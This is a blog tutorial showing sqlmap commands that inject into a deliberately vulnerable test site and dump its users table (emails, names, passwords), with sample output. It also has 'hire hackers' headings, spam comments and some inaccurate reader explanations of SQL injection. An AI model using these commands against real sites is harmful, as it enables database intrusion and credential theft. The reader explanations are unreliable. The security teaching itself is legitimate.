Hacking Website with Sqlmap in Kali Linux

Hacking Website with Sqlmap in Kali Linux

Disclaimer – TLDR; some stuff here can be used to carry out illegal activity, our intention is, however, to educate

HOW TO DO SQL INJECTION FROM LINUX? | Hacking & Tricks

In the previous tutorial, we hacked a website using nothing but a simple browser on a Windows machine. It was a pretty clumsy method to say the least. However, knowing the basics is necessary before we move on to the advanced tools. In this tutorial, we’ll be using Kali Linux (see the top navigation bar to find how to install it if you haven’t already) and SqlMap (which comes preinstalled in Kali) to automate what we manually did in the Manual SQL Injection tutorial to hack websites.

Now it is recommended that you go through the above tutorial once so that you can get an idea about how to find vulnerable sites. In this tutorial we’ll skip the first few steps in which we find out whether a website is vulnerable or not, as we already know from the previous tutorial that this website is vulnerable.

Kali Linux

First off, you need to have Kali linux (or backtrack) up and running on your machine. Any other Linux distro might work, but you’ll need to install Sqlmap on your own. Now if you don’t have Kali Linux installed, you might want to go to this page, which will get you started on Beginner Hacking Using Kali Linux

Sqlmap

sqlmap v1.0.3#dev - Automatic SQL injection and database ...

Basically its just a tool to make Sql Injection easier. Their official website  introduces the tool as -“sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.” A lot of features can be found on the SqlMap website, the most important being – “Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.” That’s basically all the database management systems. Most of the time you’ll never come across anything other than MySql. 

Hire Professional Hackers to Penetrate Websites Using Sqlmap in Kali linux

Sql Version

Boot into your Kali linux machine. Start a terminal, and type –

sqlmap -h

It lists the basic commands that are supported by SqlMap. To start with, we’ll execute a simple command
sqlmap -u <URL to inject>. In our case, it will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Sometimes, using the –time-sec helps to speed up the process, especially when the server responses are slow.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –time-sec 15

Either ways, when sqlmap is done, it will tell you the Mysql version and some other useful information about the database.

The final result of the above command should be something like this.

Note: Depending on a lot of factors, sqlmap my sometimes ask you questions which have to be answered in yes/no. Typing y means yes and n means no. Here are a few typical questions you might come across-

  • Some message saying that the database is probably Mysql, so should sqlmap skip all other tests and conduct mysql tests only. Your answer should be yes (y).
  • Some message asking you whether or not to use the payloads for specific versions of Mysql. The answer depends on the situation. If you are unsure, then its usually better to say yes.

Enumeration

Database

In this step, we will obtain database name, column names and other useful data from the database.

List of  a few common enumeration commands

So first we will get the names of available databases. For this we will add –dbs to our previous command. The final result will look like –

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs

 So the two databases are acuart and information schema.

Table

Now we are obviously interested in acuart database. Information schema can be thought of as a default table which is present on all your targets, and contains information about structure of databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using –tables command. The final sqlmap command will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart –tables

The result should be something like this –
Database: acuart
[8 tables]
+———–+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+———–+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

HIRE PROFESSIONAL EXPERTS WITH SQLmAP IN KHALI LINUX

Columns

Now we will specify the database using -D, the table using -T, and then request the columns using –columns. I hope you guys are starting to get the pattern by now. The most appealing table here is users. It might contain the username and passwords of registered users on the website (hackers always look for sensitive data). The final command must be something like-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users –columns

The result would resemble this-

Data

Now, if you were following along attentively, now we will be getting data from one of the columns. While that hypothesis is not completely wrong, its time we go one step ahead. Now we will be getting data from multiple columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using –dump. We will enter multiple columns and separate them with commas. The final command will look like this.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass –dump

 Here’s the result

John Smith, of course. And the password is test. Email is email@email.com?? Okay, nothing great, but in the real world web pentesting, you can come across more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Don’t get tempted to join the dark side. You don’t look pretty behind the bars. That’s it for this tutorial. Try to look at other columns and tables and see what you can dig up. Take a look at the previous tutorial on Manual SQl Injection which will help you find more interesting vulnerable site

11 thoughts on “Hacking Website with Sqlmap in Kali Linux

  1. Hi How Are you
    I know that here use linux
    but I happen to have a problem with sqlmap recently installed Windows 8.1 along with Python 2.7, but when you open the cmd and type command sqlmap.py -u http: //www.teamger.us / store.php? ID = 1 –dbs throws me an error on a notepad
    Link: /// file G: / Error sqlmap.py
    I hope you can help me with this problem. Thank you

  2. Appreciating the hard work you put into your site and detailed information you offer. It’s nice to come across a blog every once in a while that isn’t the same out of date rehashed material, Asking questions are truly good thing if you are not understanding something fully, except this article presents pleasant understanding yet, Please stay us informed like this. Thank you for sharing.

    This information is impressive; I am inspired with your post writing style & how continuously you describe this topic. After reading your post, thanks for taking the time to discuss this, I feel happy about it and I love learning more about this topic.

  3. Excellent Post as always and you have a great post and i like it
    โปรโมชั่นGclub ของทางทีมงานตอนนี้แจกฟรีโบนัส 50%
    เพียงแค่คุณสมัคร Gclub กับทางทีมงานของเราเพียงเท่านั้น
    ร่วมมาเป็นส่วนหนึ่งกับเว็บไซต์คาสิโนออนไลน์ของเราได้เลยค่ะ
    สมัครสมาชิกที่นี่

  4. Writing articles that are very interesting and very neat, at first I did not understand how to write good articles,
    after I saw your website I began to learn and understand how to write the right articles.
    Thank you foWriting articles that are very interesting and very neat, at first I did not understand how to write good articles,
    after I saw your website I began to learn and understand how to write the right articles.
    Thank you for giving a very good example of writing, I will often come to your website to learn how to write like the one on your website.
    Satta king 2019
    r giving a very good example of writing, I will often come to your website to learn how to write like the one on your website.
    Satta king 2019

  5. There is a common misconception based on the fact that one form of hacking is called an SQL injection attack. That seems to imply that somehow SQL is used to attack databases. This is not the case. SQL is used to create, modify, delete, and query databases, not to hack them. SQL is the doorkeeper that grants access to a database. That means that any hack attempt must fool the SQL doorkeeper into letting it through. When you enter data into a data entry field, it is an SQL statement that receives that entry and decides what to do with it. If the entry is not well-formed, as it would purposely not be in a deliberate attack, it’s possible for the SQL guarding the door to mishandle it. This could lead to the unintended revealing of system information, and ultimately to the hacker taking over not just the database, but the entire database server. This whole disaster can be averted by having the doorkeeper respond properly to illegal data entries.

  6. Let me clear some things up first — SQL is a method of storing structured data (in tables and databases, for example.)

    In fact, SQL is the foundation of a database — you don’t use it to attack itself.

    There are different ways of gaining unauthorized access to a say, MySQL database. You could get in with a SQL injection, by attacking a website’s backend, or maybe get in by slipping through the server’s unsecured SSH server.

    Hope this helps.

  7. SQL is a language invented for querying and manipulating relational databases. What hackers would do is figure out how to send SQL commands the owners of the database didn’t intend.

    This can be done sometimes by entering SQL commands into forms on websites that were written with the assumption that only nonexecutable data would be entered.

  8. If you are referring to SQL injection then i must tell you that in current software industry nobody uses direct one if else condition to login inside a website .

    This is how previous logins used to be

    User : xyz Password : 124

    if i am logging with correct pass then server side code code does this :

    select * from loginTable where User = xyz

    If this matches with the current then login success .

    Now to break this code simple change is needed .

    just change like this

    Password = (1=1)

    This will be true in every case and hence SQL injection will break the security .

    Now a days LDAP mechanisms are used for login . It’s highly secure and reliable .

  9. If you mean bypass security mechanisms and inject malicious code or data into a system, the answer is sort of yes. You can do something called SQL injection, where malicious SQL code is entered into a system. This is usually due to a security vulnerability in the system that accepts the SQL code.

    If the vulnerable system is vulnerable enough, the injected code could even do serious damage if the right kind of statements were used.

Leave a Reply

Your email address will not be published. Required fields are marked *